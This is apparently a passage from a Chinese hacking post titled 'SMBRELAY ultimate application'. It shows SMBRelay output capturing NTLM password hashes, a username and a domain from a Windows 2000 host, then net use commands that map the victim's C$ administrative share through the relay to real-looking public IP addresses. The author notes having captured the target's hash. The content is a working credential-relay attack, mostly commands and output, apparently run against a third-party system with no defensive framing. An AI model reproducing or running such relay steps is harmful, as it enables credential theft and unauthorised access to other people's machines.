SMBRELAY终极应用

>...
Response:     Positive Session Response  4 bytes

Request type: Session Message  137 bytes
SMB_COM_NEGOTIATE
Response:     Session Message  115 bytes
Challenge (8 bytes):    33C0E036880693BB

Request type: Session Message  290 bytes
SMB_COM_SESSION_SETUP_ANDX
Password lengths: 24 24
Case insensitive password:  FA31DD7DA7659D4DB6273B2AC9AF9FCCEA912F843B5A1874
Case sensitive password:    E53DFF557C5E7C37FD34FB5FD959CC26DB335F4C2AB44585
Username:     "UUSER_VODSER"
Domain:       "VODSER"
OS:           "Windows 2000 2195"
Lanman type:  "Windows 2000 5.0"
???:          ""
Response:     Session Message  154 bytes
OS:           "Windows 5.0"
Lanman type:  "Windows 2000 LAN Manager"
Domain:       "WORKGROUP"

Password hash written to disk
Connected?
Bound to port 139 on address 218.197.248.154 relaying for host VODSER 202.114.28
.249
--------------------------------------------------------------------------------

这时候，我已经抓到对方HASH了，下面是影射对方C盘

----------------------------------------

E:\>net use \\218.197.248.154
命令成功完成。


E:\>net use h: \\218.197.248.154\c$
命令成功完成。


----------------------------------------------------------------------------

第一屏的显示如下

---------------------------------------------------------

Connection rejected: 202.114.28.249 already connected
*** Relay connection for target VODSER received from 218.197.248.212:1615
 *** Sent positive session response for relay target VODSER
 *** Sent dialect selection response (5) for target VODSER
 *** Sent SMB Session setup response for relay to VODSER
Termination requested...
Deleted incoming IP address
 *** Relay disconnected from target VODSER
*** Target VODSER Disconnected
Exiting main
-------------------------------------------------------------------------

关键词：SMBRELAY终极应用